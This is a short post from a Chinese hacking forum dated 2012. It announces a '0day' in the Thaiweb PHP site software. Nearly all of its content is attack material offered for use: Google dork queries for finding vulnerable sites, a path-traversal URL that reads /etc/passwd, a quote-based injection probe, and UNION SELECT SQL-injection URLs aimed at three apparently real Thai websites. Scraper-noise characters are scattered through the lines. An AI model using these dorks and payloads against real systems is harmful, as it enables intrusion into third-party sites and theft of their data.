找回密码
 立即注册
查看: 3061|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:* x! c, }. y7 h4 T
9 X  T5 H2 `' k% r4 L
intext:powered by Thaiweb
1 D8 n* J% F$ H' s( [
3 ]) [; ]9 j$ z' e: Z, T) xinurl:index.php?page=board.php; v$ i$ m9 e4 n6 U
7 Y! e- {0 A! A' C
: i# }1 p8 q' Q6 Z) ^* Q. q9 ?$ [
6 o/ a. {8 I. U, u% A6 B
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd1 _1 A# N5 h; z( G3 r4 w

1 k2 g: k, k( B* I' L ' @) D7 }! y4 C7 p& ~, W6 P" T

6 ~, t0 N' a: T. c* t4 T利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'+ k% |5 Q7 L1 [1 {$ W$ H& _
: k- `- L% \* x

  c0 t# R; k8 M1 C- N7 k7 m- b5 r# Q, N) }$ w" v) k
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
$ p# |" w; a% c6 M
, E. e# y  b, B' x; G1 g. }0 ]http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--+ T! j6 `# \$ z4 Z3 |* O* }

( E$ y! p/ J. y6 g0 @: [http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--! x2 S* E5 \' c4 Q4 O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表